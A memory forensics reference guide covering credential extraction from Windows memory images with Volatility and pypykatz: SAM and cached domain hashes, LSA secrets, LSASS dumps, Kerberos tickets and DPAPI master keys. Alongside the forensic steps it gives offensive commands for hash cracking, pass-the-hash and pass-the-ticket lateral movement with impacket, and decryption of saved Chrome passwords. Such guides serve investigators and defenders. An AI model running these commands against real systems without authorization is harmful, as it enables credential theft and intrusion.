Credential Extraction
Memory forensics is one of the most reliable methods for credential extraction β credentials must pass through memory to be used, and many authentication mechanisms cache them there. The techniques below range from structured plugins to full memory dump analysis with offline tools.
Credential extraction produces sensitive data. Ensure proper authorization and handling procedures are followed β extracted hashes and credentials must be stored and transmitted in accordance with applicable security policies.
Windows Password Hashesβ
hashdump β SAM Database Hash Extractionβ
Extracts NTLM password hashes from the SAM hive using the SYSKEY stored in the SYSTEM hive β both must be present in memory. Returns username:RID:LM_hash:NTLM_hash format, directly usable with offline cracking tools.
vol.py -f <image> --profile=<profile> hashdump
vol3 -f <image> windows.hashdump
# Hashcat β NTLM mode (3000 = LM, 1000 = NTLM)
hashcat -m 1000 /output/hashes.txt /wordlists/rockyou.txt
# Pass-the-Hash with impacket (no cracking required)
impacket-psexec -hashes :<NTLM_hash> administrator@<target_ip>
cachedump β Cached Domain Credentialsβ
Extracts cached domain credentials (DCC2 / MSCACHEv2 hashes) stored in HKLM\SECURITY\Cache. These are stored on domain-joined machines to allow logon when the DC is unreachable β up to 10 entries by default.
vol.py -f <image> --profile=<profile> cachedump
vol3 -f <image> windows.cachedump
DCC2 hashes are slow to crack β they use PBKDF2 with 10,240 iterations. Use hashcat mode 2100:
hashcat -m 2100 /output/cached_hashes.txt /wordlists/rockyou.txt
lsadump β LSA Secretsβ
Extracts LSA secrets from HKLM\SECURITY\Policy\Secrets β includes service account passwords, DPAPI master keys, auto-logon credentials, and VPN/wireless PSKs stored by Windows.
vol.py -f <image> --profile=<profile> lsadump
vol3 -f <image> windows.lsadump
| Secret Name | Contents |
|---|---|
_SC_<ServiceName> | Service account password for the named service |
DPAPI_SYSTEM | DPAPI master key β used to decrypt user DPAPI blobs |
DefaultPassword | Auto-logon password (if configured) |
$MACHINE.ACC | Machine account password for domain join |
NL$KM | Cached credentials encryption key |
LSASS Memory Analysisβ
lsass.exe holds plaintext credentials, NTLM hashes, Kerberos tickets, and DPAPI keys in memory for all currently and recently logged-on users. Dumping its memory is the most comprehensive credential extraction technique.
Step 1 β Identify the LSASS PIDβ
vol.py -f <image> --profile=<profile> pslist | grep lsass
vol3 -f <image> windows.pslist | grep lsass
Step 2 β Dump Full LSASS Memoryβ
vol.py -f <image> --profile=<profile> memdump -p <lsass_PID> -D /output/
vol3 -f <image> windows.memmap --dump --pid <lsass_PID>
Output file: pid.<lsass_PID>.dmp
Step 3 β Extract Credentials with pypykatz (Offline Mimikatz)β
pypykatz is a pure Python implementation of Mimikatz that runs offline against a memory dump:
# Install
pip install pypykatz
# Parse lsass memdump β outputs all credential material
pypykatz lsa minidump /output/<lsass_PID>.dmp
# Output to JSON for easier parsing
pypykatz lsa minidump /output/<lsass_PID>.dmp -o /output/creds.json --json
pypykatz will extract:
- msv β NTLM hashes (from NTLM SSP)
- wdigest β Plaintext passwords (if WDigest enabled β Windows 7/2008 R2 and older by default, or if registry key set by attacker)
- kerberos β Kerberos tickets and plaintext passwords
- ssp β SSP credential cache
- credman β Windows Credential Manager entries
- dpapi β DPAPI master keys
On Windows 8.1+ and Server 2012 R2+, WDigest is disabled by default (no plaintext in memory). However, attackers can re-enable it via:
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest β UseLogonCredential = 1
Check if this key was set:
vol.py -f <image> --profile=<profile> printkey \
-o <SYSTEM_offset> \
-K "ControlSet001\Control\SecurityProviders\WDigest"
Kerberos Ticketsβ
kerberos / Ticket Extractionβ
Extract Kerberos TGTs and service tickets cached in memory. Kerberos tickets can be used for pass-the-ticket attacks to impersonate users without needing their password.
# Vol2 β via pypykatz after memdump (most reliable)
pypykatz lsa minidump /output/<lsass_PID>.dmp | grep -A5 "kerberos"
# Vol2 plugin (if available in your build)
vol.py -f <image> --profile=<profile> mimikatz
# Dump lsass memory and process with pypykatz
vol3 -f <image> windows.memmap --dump --pid <lsass_PID>
pypykatz lsa minidump pid.<lsass_PID>.dmp
Exported Kerberos tickets (.kirbi format from Mimikatz or Rubeus) can be used for lateral movement:
# Convert to ccache for Linux tools
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=/output/ticket.ccache
# Use with impacket tools
impacket-psexec -k -no-pass administrator@<target_hostname>
DPAPI Master Keysβ
DPAPI (Data Protection API) is used by Windows to encrypt browser-saved passwords, Wi-Fi keys, RDP credentials, and more. The master keys needed to decrypt this material are cached in lsass memory.
# Extract DPAPI master keys from lsass memdump
pypykatz lsa minidump /output/<lsass_PID>.dmp --json | python3 -c "
import json,sys
data=json.load(sys.stdin)
for luid,entry in data.items():
for mk in entry.get('dpapi',[]):
print(mk)
"
With the master key, decrypt DPAPI blobs offline:
# Decrypt Chrome saved passwords (example)
impacket-dpapi masterkey -file /output/masterkey_blob -pvk /output/domain_backup.pvk
impacket-dpapi credential -masterkey <masterkey_hex> -file /Chrome/Login\ Data